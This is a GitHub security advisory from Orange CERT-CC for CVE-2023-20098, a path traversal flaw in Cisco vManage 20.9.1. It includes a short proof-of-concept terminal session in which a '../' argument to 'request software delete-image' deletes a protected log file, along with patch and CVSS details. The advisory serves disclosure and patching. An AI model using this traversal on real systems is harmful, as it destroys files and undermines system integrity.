Skip to content

Cisco vManage - Unauthorized data access (CVE-2023-20098)

Moderate
orange-cert-cc published GHSA-5j43-q336-92ch May 9, 2023

Package

vManager (Cisco)

Affected versions

20.9.1
20.9.1

Patched versions

20.9.3
20.11

Description

Overview

Loss of vManage firmware image availability

Details

On vManage 20.9.1, CLI users with access to “request software delete-image” can delete files outside /images directory.
Below, demo deleting a log file that I don’t have rights to delete directly on shell.
This command does not exist in 20.6.4, so current production versions are not affected.

Proof of Concept

Following commands executed as standard user (not root):

BGE-VDR-vMM-2:/var/log$ ls -l vsyslog*
-rw-r--r-- 1 root adm   4204176 Oct 27 08:56 vsyslog
-rw-r--r-- 1 root adm  10485911 Oct 25 21:53 vsyslog.1
-rw-r--r-- 1 root root 10485838 Sep  8 11:45 vsyslog.10
-rw-r--r-- 1 root adm  10485942 Oct 22 05:36 vsyslog.2
-rw-r--r-- 1 root adm  10485834 Oct 18 13:24 vsyslog.3
-rw-r--r-- 1 root adm  10486296 Oct 14 21:24 vsyslog.4
-rw-r--r-- 1 root adm  10488153 Oct 11 05:24 vsyslog.5
-rw-r--r-- 1 root adm  10486362 Oct  7 13:16 vsyslog.6
-rw-r--r-- 1 root adm  10485894 Oct  3 23:26 vsyslog.7
-rw-r--r-- 1 root adm  10485851 Sep 30 07:25 vsyslog.8
-rw-r--r-- 1 root adm  10485910 Sep 26 15:38 vsyslog.9
BGE-VDR-vMM-2:/var/log$ rm vsyslog.10
rm: remove write-protected regular file 'vsyslog.10'? y
rm: cannot remove 'vsyslog.10': Permission denied
BGE-VDR-vMM-2:/var/log$ exit
exit
BGE-VDR-vMM-2# request software delete-image ../var/log/vsyslog.10
status Deleted /images/../var/log/vsyslog.10
BGE-VDR-vMM-2# vs
BGE-VDR-vMM-2:~$ ls -l /var/log/vsyslog.*
-rw-r--r-- 1 root adm 10485911 Oct 25 21:53 /var/log/vsyslog.1
-rw-r--r-- 1 root adm 10485942 Oct 22 05:36 /var/log/vsyslog.2
-rw-r--r-- 1 root adm 10485834 Oct 18 13:24 /var/log/vsyslog.3
-rw-r--r-- 1 root adm 10486296 Oct 14 21:24 /var/log/vsyslog.4
-rw-r--r-- 1 root adm 10488153 Oct 11 05:24 /var/log/vsyslog.5
-rw-r--r-- 1 root adm 10486362 Oct  7 13:16 /var/log/vsyslog.6
-rw-r--r-- 1 root adm 10485894 Oct  3 23:26 /var/log/vsyslog.7
-rw-r--r-- 1 root adm 10485851 Sep 30 07:25 /var/log/vsyslog.8
-rw-r--r-- 1 root adm 10485910 Sep 26 15:38 /var/log/vsyslog.9
BGE-VDR-vMM-2:~$ exit
exit
BGE-VDR-vMM-2# show ver
20.9.1

Solution

Security patch

Upgrade to patched Cisco IOS release, as described in Cisco Security Advisory

References

https://nvd.nist.gov/vuln/detail/CVE-2023-20098
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-priv-escalate-Xg8zkyPk

Credits

Orange CERT-CC
Frederic MEZOU at Orange Business

Timeline

Date reported: October28, 2022
Date fixed: April 19, 2023

Severity

Moderate
4.4
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

CVE ID

CVE-2023-20098

Weaknesses

No CWEs